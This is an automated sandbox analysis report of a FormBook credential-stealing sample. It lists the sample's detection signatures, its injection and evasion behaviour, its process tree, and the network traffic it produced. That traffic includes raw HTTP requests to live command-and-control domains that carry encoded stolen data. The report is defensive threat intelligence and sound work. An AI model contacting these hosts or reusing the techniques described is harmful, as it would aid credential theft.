Edit tour

Windows Analysis Report
FG5wHs4fVX.exe

Overview

General Information

Sample name:	FG5wHs4fVX.exe renamed because original name is a hash value
Original sample name:	9300490b5573632ebb7a5bfcf1f2b75b6e6a5b23a3af159b9aa19b10274ce0db.exe
Analysis ID:	1587853
MD5:	dab4b7efb8bdd226845a3ffd88fc6fa4
SHA1:	cb798a75a6b322d259f30405609b51ad45a975f5
SHA256:	9300490b5573632ebb7a5bfcf1f2b75b6e6a5b23a3af159b9aa19b10274ce0db
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

FG5wHs4fVX.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\FG5wHs4fVX.exe" MD5: DAB4B7EFB8BDD226845A3FFD88FC6FA4)

svchost.exe (PID: 7836 cmdline: "C:\Users\user\Desktop\FG5wHs4fVX.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

iiYhUrEPyAr.exe (PID: 796 cmdline: "C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

mtstocom.exe (PID: 7208 cmdline: "C:\Windows\SysWOW64\mtstocom.exe" MD5: 5930C59472F42B5F237500C999727441)

iiYhUrEPyAr.exe (PID: 6948 cmdline: "C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6252 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2633551510.00000000031D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2633503948.0000000003180000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2028436007.0000000000320000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2633311289.0000000000C80000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2634275836.00000000007C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2029304266.0000000003120000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2029367705.0000000003E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2634969008.0000000003340000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.320000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.320000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\FG5wHs4fVX.exe", CommandLine: "C:\Users\user\Desktop\FG5wHs4fVX.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\FG5wHs4fVX.exe", ParentImage: C:\Users\user\Desktop\FG5wHs4fVX.exe, ParentProcessId: 7760, ParentProcessName: FG5wHs4fVX.exe, ProcessCommandLine: "C:\Users\user\Desktop\FG5wHs4fVX.exe", ProcessId: 7836, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\FG5wHs4fVX.exe", CommandLine: "C:\Users\user\Desktop\FG5wHs4fVX.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\FG5wHs4fVX.exe", ParentImage: C:\Users\user\Desktop\FG5wHs4fVX.exe, ParentProcessId: 7760, ParentProcessName: FG5wHs4fVX.exe, ProcessCommandLine: "C:\Users\user\Desktop\FG5wHs4fVX.exe", ProcessId: 7836, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:38:52.048406+0100	2018141	1	A Network Trojan was detected	18.143.155.63	80	192.168.2.9	49983	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.cloijz.info/r4db/	Avira URL Cloud: Label: phishing
Source: http://www.xinchaocjcela.net/uw0r/?vlKLavJp=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRMbOt/OPSf4dzGL/I4GGe8jtT/v+mCQ==&oLbh=Z4SLXZCPeLcly	Avira URL Cloud: Label: malware
Source: http://www.cloijz.info/r4db/?vlKLavJp=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpHAtCoiRayvgo5qh3BGhuPHZLV4qkZw==&oLbh=Z4SLXZCPeLcly	Avira URL Cloud: Label: phishing
Source: http://www.xinchaocjcela.net/uw0r/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: FG5wHs4fVX.exe	ReversingLabs: Detection: 76%
Source: FG5wHs4fVX.exe	Virustotal: Detection: 36%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2633551510.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2633503948.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2028436007.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2633311289.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2634275836.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2029304266.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2029367705.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2634969008.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: FG5wHs4fVX.exe

Joe Sandbox ML: detected

Source: FG5wHs4fVX.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: mtstocom.pdb source: svchost.exe, 00000002.00000003.1996128932.000000000085B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1996032422.000000000081A000.00000004.00000020.00020000.00000000.sdmp, iiYhUrEPyAr.exe, 00000006.00000002.2633604205.0000000000B97000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iiYhUrEPyAr.exe, 00000006.00000002.2634118255.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, iiYhUrEPyAr.exe, 00000008.00000002.2634982649.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: FG5wHs4fVX.exe, 00000000.00000003.1412579286.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, FG5wHs4fVX.exe, 00000000.00000003.1412200937.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1931450743.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2028697509.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2028697509.0000000000C6E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1934158532.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000003.2028664135.0000000004B4B000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2635068902.000000000504E000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2635068902.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000003.2030969747.0000000004CFB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FG5wHs4fVX.exe, 00000000.00000003.1412579286.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, FG5wHs4fVX.exe, 00000000.00000003.1412200937.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1931450743.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2028697509.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2028697509.0000000000C6E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1934158532.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, mtstocom.exe, 00000007.00000003.2028664135.0000000004B4B000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2635068902.000000000504E000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2635068902.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000003.2030969747.0000000004CFB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mtstocom.pdbGCTL source: svchost.exe, 00000002.00000003.1996128932.000000000085B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1996032422.000000000081A000.00000004.00000020.00020000.00000000.sdmp, iiYhUrEPyAr.exe, 00000006.00000002.2633604205.0000000000B97000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: mtstocom.exe, 00000007.00000002.2635729074.00000000054DC000.00000004.10000000.00040000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2633609388.0000000003266000.00000004.00000020.00020000.00000000.sdmp, iiYhUrEPyAr.exe, 00000008.00000000.2101262776.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2335691103.000000002D73C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: mtstocom.exe, 00000007.00000002.2635729074.00000000054DC000.00000004.10000000.00040000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2633609388.0000000003266000.00000004.00000020.00020000.00000000.sdmp, iiYhUrEPyAr.exe, 00000008.00000000.2101262776.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2335691103.000000002D73C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007CDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007CDBBE
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_0079C2A2 FindFirstFileExW,	0_2_0079C2A2
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D68EE FindFirstFileW,FindClose,	0_2_007D68EE
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_007D698F
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007CD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007CD076
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007CD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007CD3A9
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007D9642
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007D979D
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_007D9B2B
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007D5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_007D5C97
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C9C4D0 FindFirstFileW,FindNextFileW,FindClose,	7_2_00C9C4D0

Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 4x nop then xor eax, eax		7_2_00C89E30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_04CF04DF

Source: Joe Sandbox View	IP Address: 47.83.1.90 47.83.1.90
Source: Joe Sandbox View	IP Address: 18.143.155.63 18.143.155.63

Source: Network traffic

Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.143.155.63:80 -> 192.168.2.9:49983

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007DCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_007DCE44

Source: global traffic	HTTP traffic detected: GET /30sl/?oLbh=Z4SLXZCPeLcly&vlKLavJp=Y8m72M9itisBKHCuJygfmdA87gCGNftSw12cMpbnF1u6Xw97jV7YOpeEW7zuXiNJMD7NgZYDN5Q2P1YDh66t+LWy3lELjPgtDlmd7njEJtKsP2gRrQ== HTTP/1.1Host: www.wuyyv4tq.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Source: global traffic	HTTP traffic detected: GET /r4db/?vlKLavJp=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpHAtCoiRayvgo5qh3BGhuPHZLV4qkZw==&oLbh=Z4SLXZCPeLcly HTTP/1.1Host: www.cloijz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Source: global traffic	HTTP traffic detected: GET /uw0r/?vlKLavJp=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRMbOt/OPSf4dzGL/I4GGe8jtT/v+mCQ==&oLbh=Z4SLXZCPeLcly HTTP/1.1Host: www.xinchaocjcela.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0

Source: global traffic	DNS traffic detected: DNS query: www.wuyyv4tq.top
Source: global traffic	DNS traffic detected: DNS query: www.cloijz.info
Source: global traffic	DNS traffic detected: DNS query: www.xinchaocjcela.net
Source: global traffic	DNS traffic detected: DNS query: www.grimbo.boats

Source: unknown

HTTP traffic detected: POST /r4db/ HTTP/1.1Host: www.cloijz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 197Origin: http://www.cloijz.infoReferer: http://www.cloijz.info/r4db/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0Data Raw: 76 6c 4b 4c 61 76 4a 70 3d 49 53 58 78 53 50 74 31 7a 75 4f 56 50 67 6c 47 64 4e 57 46 51 63 52 32 48 51 61 76 72 66 61 78 2f 4b 69 7a 76 62 45 6b 74 71 47 55 32 6b 56 49 78 62 36 72 67 37 35 55 67 4e 36 6f 56 6a 6d 66 70 70 47 47 4b 31 64 49 35 45 44 6b 4c 44 33 59 71 6b 33 73 4e 77 42 33 2f 69 39 34 6e 50 56 64 77 76 42 54 58 69 39 48 4e 41 39 6f 5a 2b 36 4c 59 37 30 6c 6f 37 31 7a 71 73 4f 2f 59 33 69 75 62 4d 72 55 32 48 34 6e 2b 74 4e 54 41 46 63 47 52 66 66 39 4e 79 50 64 62 34 2f 68 78 43 64 32 66 79 4c 42 56 46 33 55 2f 47 49 38 4f 68 70 58 68 57 6a 74 45 76 77 6c 50 49 37 54 Data Ascii: vlKLavJp=ISXxSPt1zuOVPglGdNWFQcR2HQavrfax/KizvbEktqGU2kVIxb6rg75UgN6oVjmfppGGK1dI5EDkLD3Yqk3sNwB3/i94nPVdwvBTXi9HNA9oZ+6LY70lo71zqsO/Y3iubMrU2H4n+tNTAFcGRff9NyPdb4/hxCd2fyLBVF3U/GI8OhpXhWjtEvwlPI7T

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 17:38:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Source: iiYhUrEPyAr.exe, 00000008.00000002.2634275836.0000000000816000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.xinchaocjcela.net
Source: iiYhUrEPyAr.exe, 00000008.00000002.2634275836.0000000000816000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.xinchaocjcela.net/uw0r/
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mtstocom.exe, 00000007.00000003.2217930083.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2633609388.0000000003281000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mtstocom.exe, 00000007.00000002.2633609388.0000000003281000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mtstocom.exe, 00000007.00000003.2216756937.0000000008096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: mtstocom.exe, 00000007.00000002.2633609388.0000000003281000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mtstocom.exe, 00000007.00000002.2633609388.0000000003281000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: mtstocom.exe, 00000007.00000002.2633609388.0000000003281000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mtstocom.exe, 00000007.00000002.2633609388.0000000003281000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: mtstocom.exe, 00000007.00000003.2230772926.00000000080BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007DEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_007DEAFF

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007DED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_007DED6A

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

0_2_007DEAFF

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007CAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_007CAA57

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007F9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_007F9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2633551510.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2633503948.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2028436007.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2633311289.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2634275836.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2029304266.0000000003120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2029367705.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2634969008.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: FG5wHs4fVX.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: FG5wHs4fVX.exe, 00000000.00000000.1391345732.0000000000822000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e237b2db-2
